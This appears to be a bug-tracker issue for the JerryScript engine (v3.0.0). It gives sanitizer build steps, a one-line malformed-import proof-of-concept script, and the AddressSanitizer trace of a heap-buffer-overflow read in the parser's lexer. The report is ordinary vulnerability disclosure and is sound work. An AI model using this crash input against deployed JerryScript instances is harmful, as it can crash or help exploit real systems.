Open
Description
JerryScript revision
Commit: c509a06
Version: v3.0.0
Build platform
Ubuntu 24.04.1 LTS (Linux 6.8.0-49-generic x86_64)
Build steps
python3 ./tools/build.py --builddir=build_normal --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20Test case
// poc.js
import{a as``,𝖊,d as"\D"
Execution steps
./jerry poc.jsOutput
=================================================================
==101978==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x504000000036 at pc 0x7eed850c9eaa bp 0x7ffd367f1020 sp 0x7ffd367f07c8
READ of size 104 at 0x504000000036 thread T0
#0 0x7eed850c9ea9 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:813
#1 0x7eed850ca37a in memcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:845
#2 0x7eed850ca37a in memcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:840
#3 0x59f5b5dcc5c0 in lexer_construct_literal_object /jerryscript/jerry-core/parser/js/js-lexer.c:2420
#4 0x59f5b5d7fc99 in scanner_check_variables /jerryscript/jerry-core/parser/js/js-scanner-util.c:2279
#5 0x59f5b5d7996f in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2274
#6 0x59f5b5d1f42b in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418
#7 0x59f5b5d1f642 in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486
#8 0x59f5b5de8a46 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
#9 0x59f5b5de8ae2 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
#10 0x59f5b5d19d90 in main /jerryscript/jerry-main/main-desktop.c:156
#11 0x7eed84c2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#12 0x7eed84c2a28a in __libc_start_main_impl ../csu/libc-start.c:360
#13 0x59f5b5d1c244 in _start (/jerryscript/build_normal/bin/jerry+0x2a244) (BuildId: 3d6b06d6d31662bc580b73f5542d8d3069a1e936)
0x504000000036 is located 0 bytes after 38-byte region [0x504000000010,0x504000000036)
allocated by thread T0 here:
#0 0x7eed850fd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
#1 0x59f5b5de9388 in jerry_port_source_read /jerryscript/jerry-port/common/jerry-port-fs.c:72
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:813 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long)
Shadow bytes around the buggy address:
0x503ffffffd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503ffffffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503ffffffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503fffffff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x503fffffff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x504000000000: fa fa 00 00 00 00[06]fa fa fa fa fa fa fa fa fa
0x504000000080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x504000000280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==101978==ABORTING